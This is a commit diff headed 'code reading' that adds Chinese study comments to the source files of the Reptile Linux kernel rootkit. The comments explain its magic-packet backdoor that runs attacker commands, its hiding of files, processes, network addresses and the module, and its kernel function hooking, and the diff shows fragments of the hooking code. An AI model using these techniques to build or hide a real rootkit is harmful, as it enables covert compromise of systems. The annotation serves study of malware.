code reading

1 month ago · 644304d879
parent c1ef6ff634
commit 644304d879
13 changed files with 26 additions and 13 deletions
--- a/src/Reptile/kernel/backdoor.c
+++ b/src/Reptile/kernel/backdoor.c
@ -1,3 +1,4 @@
+//后门程序，用于监听特定的网络数据包，并根据数据包的内容执行指定的命令
 #include <linux/string.h>
 #include <linux/version.h>
 #include <linux/net.h>
@ -16,7 +17,7 @@ struct shell_task {
 	char *ip;
 	char *port;
 };
-
+//命令执行
 void shell_execer(struct work_struct *work)
 {
 	struct shell_task *task = (struct shell_task *)work;
@ -28,7 +29,7 @@ void shell_execer(struct work_struct *work)
 	kfree(task->port);
 	kfree(task);
 }
-
+//添加任务到命令执行队列
 int shell_exec_queue(char *ip, char *port)
 {
 	struct shell_task *task;
@ -58,7 +59,7 @@ int shell_exec_queue(char *ip, char *port)

 #define DROP 0
 #define ACCEPT 1
-
+//解析攻击方发送的网络数据包，并根据特定条件执行命令
 unsigned int magic_packet_parse(struct sk_buff *socket_buffer)
 {
 	const struct iphdr *ip_header;
--- a/src/Reptile/kernel/dir.c
+++ b/src/Reptile/kernel/dir.c
@ -1,3 +1,4 @@
+//判断文件夹是否隐藏
 #include <linux/uaccess.h>
 #include <linux/slab.h>
 #include <linux/string.h>
--- a/src/Reptile/kernel/encrypt/encrypt.c
+++ b/src/Reptile/kernel/encrypt/encrypt.c
@ -1,3 +1,4 @@
+////使用给定的十六进制密钥对文件内容进行加密
 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
--- a/src/Reptile/kernel/file.c
+++ b/src/Reptile/kernel/file.c
@ -1,3 +1,4 @@
+//判断文件是否隐藏
 #include <linux/uaccess.h>
 #include <linux/slab.h>

--- a/src/Reptile/kernel/khook/engine.c
+++ b/src/Reptile/kernel/khook/engine.c
@ -1,9 +1,10 @@
+//内核级别的挂钩（hook）机制，主要用于在Linux内核中动态修改函数行为
 #include "internal.h"

 static khook_stub_t *khook_stub_tbl = NULL;

 ////////////////////////////////////////////////////////////////////////////////
-
+//通过内核符号表查找目标函数的地址
 static int khook_lookup_cb(long data[], const char *name, void *module, long addr)
 {
 	int i = 0; while (!module && (((const char *)data[0]))[i] == name[i]) {
@ -17,7 +18,7 @@ static void *khook_lookup_name(const char *name)
 	kallsyms_on_each_symbol((void *)khook_lookup_cb, data);
 	return (void *)data[1];
 }
-
+//将目标函数地址映射为可写内存，以便修改其代码
 static void *khook_map_writable(void *addr, size_t len)
 {
 	struct page *pages[2] = { 0 }; // len << PAGE_SIZE
@ -44,7 +45,7 @@ static void *khook_map_writable(void *addr, size_t len)
 #endif

 ////////////////////////////////////////////////////////////////////////////////
-
+//挂钩唤醒
 static void khook_wakeup(void)
 {
 	struct task_struct *p;
@ -54,7 +55,7 @@ static void khook_wakeup(void)
 	}
 	rcu_read_unlock();
 }
-
+//初始化和清理挂钩
 static int khook_sm_init_hooks(void *arg)
 {
 	khook_t *p;
--- a/src/Reptile/kernel/khook/x86/hook.c
+++ b/src/Reptile/kernel/khook/x86/hook.c
@ -1,3 +1,4 @@
+//内核中实现x86架构下的函数钩子（hook）
 #include "../internal.h"

 ////////////////////////////////////////////////////////////////////////////////
@ -10,7 +11,7 @@ static struct {
 	typeof(insn_init) *init;
 	typeof(insn_get_length) *get_length;
 } khook_arch_lde;
-
+//初始化长度解析引擎
 static inline int khook_arch_lde_init(void) {
 	khook_arch_lde.init = khook_lookup_name("insn_init");
 	if (!khook_arch_lde.init) return -EINVAL;
@ -18,7 +19,7 @@ static inline int khook_arch_lde_init(void) {
 	if (!khook_arch_lde.get_length) return -EINVAL;
 	return 0;
 }
-
+//获取指令长度
 static inline int khook_arch_lde_get_length(const void *p) {
 	struct insn insn;
 	int x86_64 = 0;
@ -35,7 +36,7 @@ static inline int khook_arch_lde_get_length(const void *p) {
 }

 ////////////////////////////////////////////////////////////////////////////////
-
+//插入跳转指令
 // place a jump at addr @a from addr @f to addr @t
 static inline void x86_put_jmp(void *a, void *f, void *t)
 {
@ -46,12 +47,12 @@ static inline void x86_put_jmp(void *a, void *f, void *t)
 static const char khook_stub_template[] = {
 # include KHOOK_STUB_FILE_NAME
 };
-
+//修复函数钩子中的占位符，
 static inline void stub_fixup(void *stub, const void *value) {
 	while (*(int *)stub != 0xcacacaca) stub++;
 	*(long *)stub = (long)value;
 }
-
+//初始化单个钩子
 static inline void khook_arch_sm_init_one(khook_t *hook) {
 	khook_stub_t *stub = KHOOK_STUB(hook);
 	if (hook->target.addr[0] == (char)0xE9 ||
@ -73,7 +74,7 @@ static inline void khook_arch_sm_init_one(khook_t *hook) {
 	}
 	hook->orig = stub->orig; // the only link from hook to stub
 }
-
+//清理单个钩子
 static inline void khook_arch_sm_cleanup_one(khook_t *hook) {
 	khook_stub_t *stub = KHOOK_STUB(hook);
 	memcpy(hook->target.addr_map, stub->orig, stub->nbytes);
--- a/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
+++ b/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
@ -1,3 +1,4 @@
+//内核模块的初始化
 #include <linux/kallsyms.h>
 #include <linux/kernel.h>
 #include <linux/module.h>
--- a/src/Reptile/kernel/loader/loader.c
+++ b/src/Reptile/kernel/loader/loader.c
@ -1,3 +1,4 @@
+//加载所需模块
 #define _GNU_SOURCE
 #include <errno.h>
 #include <fcntl.h>
--- a/src/Reptile/kernel/module.c
+++ b/src/Reptile/kernel/module.c
@ -1,3 +1,4 @@
+//内核模块隐藏
 #include <linux/module.h>
 #include <linux/mutex.h>
 #include <linux/slab.h>
--- a/src/Reptile/kernel/network.c
+++ b/src/Reptile/kernel/network.c
@ -1,3 +1,4 @@
+//网络地址隐藏
 #include <linux/version.h>
 #include <linux/inet.h>
 #include <linux/netlink.h>
--- a/src/Reptile/kernel/proc.c
+++ b/src/Reptile/kernel/proc.c
@ -1,3 +1,4 @@
+//进程隐藏
 #include <linux/version.h>
 #include <linux/uaccess.h>
 #include <linux/ctype.h>
--- a/src/Reptile/kernel/string_helpers.c
+++ b/src/Reptile/kernel/string_helpers.c
@ -1,3 +1,4 @@
+//获取命令行参数，转为可打印的字符
 #include "string_helpers.h"

 #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 7, 0)
--- a/src/Reptile/kernel/util.c
+++ b/src/Reptile/kernel/util.c
@ -1,3 +1,4 @@
+//访问和操作进程的命令行参数
 #include <linux/kmod.h>
 #include <linux/kallsyms.h>
 #include <linux/types.h>